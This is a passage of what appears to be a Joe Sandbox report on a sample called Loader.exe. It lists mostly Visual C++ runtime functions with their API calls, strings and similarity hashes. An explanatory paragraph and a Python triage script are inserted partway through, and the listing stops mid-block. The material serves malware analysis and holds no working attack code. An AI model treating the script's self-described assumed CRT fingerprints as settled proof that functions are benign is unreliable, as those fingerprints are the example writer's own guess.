                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 09d1fc1e2c10cc6998b054ac231a795bfff59ae782f3c176d7a19c9610258791
                                                                            • Instruction ID: 6fa69661851bb40e454b1bffb49710a113c3d86d76e98d66a1abb5657a3cc44e
                                                                            • Opcode Fuzzy Hash: 09d1fc1e2c10cc6998b054ac231a795bfff59ae782f3c176d7a19c9610258791
                                                                            • Instruction Fuzzy Hash: 0101B53321D615EEAA451DF99D94D863798DB83F7A721022FF720992D0EF538843C684
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DuVw$EqLs$N=G?$^9[;$vIyK$w%G'$zMNO
                                                                            • API String ID: 0-2443247208
                                                                            • Opcode ID: 221025fd2dabd3dab3c67fb90afdcac86f00cb25e9f5fe44f49ee22fe928b495
                                                                            • Instruction ID: e6aab0376b136bc08bc164b44470f9732f17d3e914732833e4885affb84ac265
                                                                            • Opcode Fuzzy Hash: 221025fd2dabd3dab3c67fb90afdcac86f00cb25e9f5fe44f49ee22fe928b495
                                                                            • Instruction Fuzzy Hash: B161FDB0250B419BE324CF66D882BD3BBE2BB45344F248D1DC1EA9BB14DB74A049CF94
                                                                            Strings
                                                                            • C:\Users\user\Desktop\Loader.exe, xrefs: 6E4FD0AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: C:\Users\user\Desktop\Loader.exe
                                                                            • API String ID: 0-2183494786
                                                                            • Opcode ID: 9501121d1448a1960be853ecc58cce8ed9270d7bb57b04d63200cfbfefdcdccf
                                                                            • Instruction ID: 4b27fedffe68e9d257b21f66eb00c313644c6bd676e5be33069d90c8af42857c
                                                                            • Opcode Fuzzy Hash: 9501121d1448a1960be853ecc58cce8ed9270d7bb57b04d63200cfbfefdcdccf
                                                                            • Instruction Fuzzy Hash: 00214C31614205EFD710AEF5CE50F8B77ADABC2B68701492AF9149B250DB71F803CAA0
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,126A8649,00000000,?,00000000,6E5039D2,000000FF,?,6E4FB038,?,?,6E4FB00C,?), ref: 6E4FB0D3
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4FB0E5
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,6E5039D2,000000FF,?,6E4FB038,?,?,6E4FB00C,?), ref: 6E4FB107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 98fef1db769efb75c113699ab1abd083800d8024ac526a93c3e32291f8d9194f
                                                                            • Instruction ID: e9bbe43864b387a364b9c3090caa56ddfdb57909b6ac6bb823403222f038fdd5
                                                                            • Opcode Fuzzy Hash: 98fef1db769efb75c113699ab1abd083800d8024ac526a93c3e32291f8d9194f
                                                                            • Instruction Fuzzy Hash: 6C018631A0496AEFDF119F90CC19FAEBBF9FB45B50F01452AF821A6380DF749901CA90
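The blocks above are the Joe Sandbox per-function view of the module mapped at 6E4F0000: for each function the report lists its API calls with call-site addresses, the strings it references, the memory dump it was recovered from, and similarity identifiers (API ID, String ID, Opcode ID and fuzzy hashes). Most of these functions are Visual C++ runtime helpers rather than sample-specific code. The GetModuleHandleExW("mscoree.dll") / GetProcAddress("CorExitProcess") / FreeLibrary sequence is the CRT exit path checking whether the CLR is loaded, the FlsGetValue/FlsSetValue pair is vcruntime per-thread storage, and the LoadLibraryExW routine that references "api-ms-" is the CRT's API-set aware library loader. The script below is an added example, not part of the report or of Joe Sandbox: it parses blocks in this listing format and tags the ones that match a known CRT fingerprint, so that review time goes to the remaining functions. The input is three blocks abbreviated from the listing above (argument lists trimmed); the fingerprint table and the verdict names are the example's own assumptions.

```python
"""Added triage helper for Joe Sandbox per-function listings (not Joe Sandbox code):
parse the APIs/Strings/Similarity blocks and tag known Visual C++ runtime helpers."""
import re
from dataclasses import dataclass, field

# Constructed input: three blocks abbreviated from the report (argument lists trimmed).
SAMPLE = r"""
APIs
• GetLastError.KERNEL32(00000001,?,6E4F9171), ref: 6E4F954A
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4F9558
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4F9571
Memory Dump Source
• Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• Instruction Fuzzy Hash: 0101B53321D615EEAA451DF99D94D863798DB83F7A721022FF720992D0EF538843C684
Strings
• C:\Users\user\Desktop\Loader.exe, xrefs: 6E4FD0AD
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\Loader.exe
• Instruction Fuzzy Hash: 00214C31614205EFD710AEF5CE50F8B77ADABC2B68701492AF9149B250DB71F803CAA0
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 6E4FB0D3
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4FB0E5
• FreeLibrary.KERNEL32(00000000,?,00000000), ref: 6E4FB107
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 6C018631A0496AEFDF119F90CC19FAEBBF9FB45B50F01452AF821A6380DF749901CA90
"""

# '• [Part of subcall function X: ]Name.MODULE[(args)], ref: ADDR'
API_LINE = re.compile(r"^•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
                      r"([\w@?$]+)\.([A-Z0-9_]+)(?:\((.*)\))?,?\s+ref:\s+([0-9A-F]+)$")

@dataclass
class ApiCall:
    name: str
    module: str  # KERNEL32, LIBCMT, LIBVCRUNTIME, ...
    args: str    # argument list as printed by the report ('' if none)
    ref: str     # call-site address

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    dump_offset: str = ""  # image base of the dump the function was recovered from

def parse_blocks(text):
    """Split the listing into FunctionBlocks; '• Instruction Fuzzy Hash:' closes one."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line  # header line: APIs, Strings, Memory Dump Source, Similarity
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                cur.apis.append(ApiCall(m[1], m[2], m[3] or "", m[4]))
        elif section == "Strings":
            cur.strings.append(body.split(", xrefs:")[0])
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            cur.dump_offset = body.split("Offset: ")[1].split(",")[0]
        elif section == "Similarity":
            key, _, val = body.partition(":")  # first ':' only; a String ID may contain ':'
            if key == "API ID":
                cur.api_id = val.strip()
            elif key == "String ID":
                cur.string_id = val.strip()
            elif key == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = FunctionBlock()
    return blocks

CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME"}
# Assumed fingerprint table keyed on the report's own (API ID, String ID) pair.
CRT_FINGERPRINTS = {
    ("AddressFreeHandleLibraryModuleProc", "CorExitProcess$mscoree.dll"):
        "CRT exit path: looks up CorExitProcess in mscoree.dll before exiting",
    ("ErrorLastValue___vcrt_", ""): "vcruntime per-thread data via FlsGetValue/FlsSetValue",
    ("LibraryLoad$ErrorLast", "api-ms-"): "CRT API-set aware LoadLibraryExW helper",
}

def classify(block):
    """Return (verdict, reason); verdict names are this example's own convention."""
    hit = CRT_FINGERPRINTS.get((block.api_id, block.string_id))
    if hit:
        return "crt", hit
    if block.apis and all(c.module in CRT_MODULES for c in block.apis):
        return "crt", "only CRT-internal calls"
    if not block.apis:
        return "data", "no API calls: string/data-only block"
    return "review", "Win32 calls not matched by a CRT fingerprint"
```

Running `classify` over the parsed blocks marks the FLS and CorExitProcess functions as CRT and the block that only carries the C:\Users\user\Desktop\Loader.exe string as data; anything left with verdict "review" is where the sample's own logic is likely to be. The fingerprint table is keyed on the API ID / String ID pair exactly as the report prints it, so new entries can be added by copying those two lines from other reports of the same runtime.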
                                                                            APIs
                                                                            • __alloca_probe_16.LIBCMT ref: 6E4FFBAA
                                                                            • __alloca_probe_16.LIBCMT ref: 6E4FFC73
                                                                            • __freea.LIBCMT ref: 6E4FFCDA
                                                                              • Part of subcall function 6E4FECBE: HeapAlloc.KERNEL32(00000000,6E4FD60A,?,?,6E4FD60A,00000220,?,00000000,?), ref: 6E4FECF0
                                                                            • __freea.LIBCMT ref: 6E4FFCED
                                                                            • __freea.LIBCMT ref: 6E4FFCFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 1096550386-0
                                                                            • Opcode ID: 6fe9c788088a42139f3786c438fe27ca2aa3903e3a06af68015e433935739d87
                                                                            • Instruction ID: 8aa224840f98f7b0f4b5da0ad7139a2fb3baa42f8555b4c3fc32058b12454639
                                                                            • Opcode Fuzzy Hash: 6fe9c788088a42139f3786c438fe27ca2aa3903e3a06af68015e433935739d87
                                                                            • Instruction Fuzzy Hash: 10518471501296EFEB118FF58C94EAB76ADEFC4F14B21052ABD14D6240EB70D812C6A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: C$D$E$G$I$K
                                                                            • API String ID: 0-3170450736
                                                                            • Opcode ID: 71d1cdf6b27191a3ceaccc997da4f88aa1c059b4041b785dbd5d8d52fc0a7042
                                                                            • Instruction ID: 06b95c9b85f16eede0dae6643b274f2d686985713970ae69746dc711415f798c
                                                                            • Opcode Fuzzy Hash: 71d1cdf6b27191a3ceaccc997da4f88aa1c059b4041b785dbd5d8d52fc0a7042
                                                                            • Instruction Fuzzy Hash: 0E11E57450C7C08ED772862894887DABFD06BA7318F184EADD4DC872D2C67A444ACB27
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E4F9AC3,00000000,?,00000001,?,?,?,6E4F9BB2,00000001,FlsFree,6E504D60,FlsFree), ref: 6E4F9B1F
                                                                            • GetLastError.KERNEL32(?,6E4F9AC3,00000000,?,00000001,?,?,?,6E4F9BB2,00000001,FlsFree,6E504D60,FlsFree,00000000,?,6E4F9611), ref: 6E4F9B29
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E4F9B51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: e15d234ed5cdfad4bcacf0d4062c736642c099850e04247209c811111e765496
                                                                            • Instruction ID: 5b1ac4b60313b76d5b2cca61ca7bb6d0a2ab0d8928393352a7bfa4030cc318ad
                                                                            • Opcode Fuzzy Hash: e15d234ed5cdfad4bcacf0d4062c736642c099850e04247209c811111e765496
                                                                            • Instruction Fuzzy Hash: FBE01A31244605F7EF501FF0DD05F493BA9AB52F41F104425FB0CB819AEB629A1296D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,$6$J$z${
                                                                            • API String ID: 0-4197712616
                                                                            • Opcode ID: 016fc98dc0c86eb96dda10b9aeb45780d7313213476c5f1c3379279f69da500d
                                                                            • Instruction ID: 6e76dfe5b76d1f0da923405abac9b85cd3577e866e8e09076d70fef77ae4abe7
                                                                            • Opcode Fuzzy Hash: 016fc98dc0c86eb96dda10b9aeb45780d7313213476c5f1c3379279f69da500d
                                                                            • Instruction Fuzzy Hash: E6615772E58165CFCF14CEECC8903EEBBF19B86324F198A29D855A73C1D6749C028791
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNEL32(126A8649,00000000,00000000,?), ref: 6E500295
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E5004E7
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E50052D
                                                                            • GetLastError.KERNEL32 ref: 6E5005D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                            • String ID:
                                                                            • API String ID: 2112829910-0
                                                                            • Opcode ID: 90171369314592f94f876447f5df17bcfb54a09c14d55efddfbe1b74509b4944
                                                                            • Instruction ID: 68bba38d66dc09b1aa170159e25ad7472030b326091e93587a3cd6c5518184d1
                                                                            • Opcode Fuzzy Hash: 90171369314592f94f876447f5df17bcfb54a09c14d55efddfbe1b74509b4944
                                                                            • Instruction Fuzzy Hash: 06D15875D046499FDB11CFE8C880AEEBBF4EF49314F14492AE555EB241EB30A942CF50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: cec873d5b1381868c1c905e03f71d272ded6bed0de23f3db8c911c666db4a6ab
                                                                            • Instruction ID: 3f9da88a134d62d737661fac609e160bcedb40dd87cf92534866eb1ba94c0a8f
                                                                            • Opcode Fuzzy Hash: cec873d5b1381868c1c905e03f71d272ded6bed0de23f3db8c911c666db4a6ab
                                                                            • Instruction Fuzzy Hash: 5351ED72501602EFEB468FF5D850FAA73A4EF85B14F204A2FEA1547294E733E842C790
                                                                            APIs
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • GetLastError.KERNEL32 ref: 6E4FC90F
                                                                            • __dosmaperr.LIBCMT ref: 6E4FC916
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 6E4FC950
                                                                            • __dosmaperr.LIBCMT ref: 6E4FC957
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1913693674-0
                                                                            • Opcode ID: 19235575ad19517273f33fe582822f0113272d130a10dbfc73dd47f4adaa5b55
                                                                            • Instruction ID: acaa48acd7ef0d0a0cc2446c9cdb3b42c290f0efe2937b1b31b955cdbe103926
                                                                            • Opcode Fuzzy Hash: 19235575ad19517273f33fe582822f0113272d130a10dbfc73dd47f4adaa5b55
                                                                            • Instruction Fuzzy Hash: 80217471A04605EFD7109FF68880D5AB7ADEF85B68701492EF925AF640DB30EC039BA4
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6E4FDD0A
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4FDD42
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4FDD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 158306478-0
                                                                            • Opcode ID: 6850f467619cb11ea3318e395d21a1310c711facc76037249f07ed9dba9bc012
                                                                            • Instruction ID: 497a3dc1c23ccccb2b3699482fe939bfa6bcf933e64d5b14f7368d422c7c0cb6
                                                                            • Opcode Fuzzy Hash: 6850f467619cb11ea3318e395d21a1310c711facc76037249f07ed9dba9bc012
                                                                            • Instruction Fuzzy Hash: 7211D6B1901659FE671117F65CC8EAF29ACDEE6A98701062EF504D6204EFA0CD0389F2
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000), ref: 6E501BBD
                                                                            • GetLastError.KERNEL32(?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?,?,6E500BC7,00000000), ref: 6E501BC9
                                                                              • Part of subcall function 6E501B8F: CloseHandle.KERNEL32(FFFFFFFE,6E501BD9,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?), ref: 6E501B9F
                                                                            • ___initconout.LIBCMT ref: 6E501BD9
                                                                              • Part of subcall function 6E501B51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E501B80,6E501353,?,?,6E500624,?,00000000,00000000,?), ref: 6E501B64
                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?), ref: 6E501BEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: e6373729694fa8336e1844fb9a8539a3f07d9be6df108678cbcb5512349f9b45
                                                                            • Instruction ID: 89a0af11885e57516d7e8baa8266a2c254debb8e6f7baa812c6ad1765911be19
                                                                            • Opcode Fuzzy Hash: e6373729694fa8336e1844fb9a8539a3f07d9be6df108678cbcb5512349f9b45
                                                                            • Instruction Fuzzy Hash: 9CF03036000518BBCF121FD5CD04AAA3FA6FB493B4F014018FF1896120EB328D60DB92
                                                                            APIs
                                                                              • Part of subcall function 6E500232: GetConsoleOutputCP.KERNEL32(126A8649,00000000,00000000,?), ref: 6E500295
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E4FEB45,?), ref: 6E500C6A
                                                                            • GetLastError.KERNEL32(?,6E4FEB45,?,6E4FE9D8,00000000,?,00000000,6E4FE9D8,?,00000000,00000000,6E5098C0,0000002C,6E4FEA49,?), ref: 6E500C74
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                            • String ID: EOn
                                                                            • API String ID: 2915228174-296699496
                                                                            • Opcode ID: 57e943814d89594a7033c3b5b0e5022fc28f09d1141d172ce743639bce718f48
                                                                            • Instruction ID: 18a5642bcb903e3468361113ccddbd98741ceea12eb41b04758803ffdc89a900
                                                                            • Opcode Fuzzy Hash: 57e943814d89594a7033c3b5b0e5022fc28f09d1141d172ce743639bce718f48
                                                                            • Instruction Fuzzy Hash: 4E619F7190411AAFDF41CFE8C894AEEBBF9BF49308F14494AFA14A7245E771DA01CB51
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 6E4FA2B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            • Opcode ID: 4d5fa19e073e14d87c163d865274b25a40b969224484ab5270f6fe4e28c3099e
                                                                            • Instruction ID: 2b3a0795f92322692b284590c45bf0ef8246259f857ad1568c5151d6f0f315b7
                                                                            • Opcode Fuzzy Hash: 4d5fa19e073e14d87c163d865274b25a40b969224484ab5270f6fe4e28c3099e
                                                                            • Instruction Fuzzy Hash: FF418A75A00209EFDF05CFE4C880EEE7BB9FF88704F15805AF90466214D7369952EB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$<?=1$<?=1$p
                                                                            • API String ID: 0-3549820269
                                                                            • Opcode ID: 822ad0e8d94173505580cfe7d1f54461285590f5db0f7c6a09e2a8107b563427
                                                                            • Instruction ID: 963316f1b0388689a1b9a40a69be48f5a5bc87dbdb5a711a5284fd5fb7bedec0
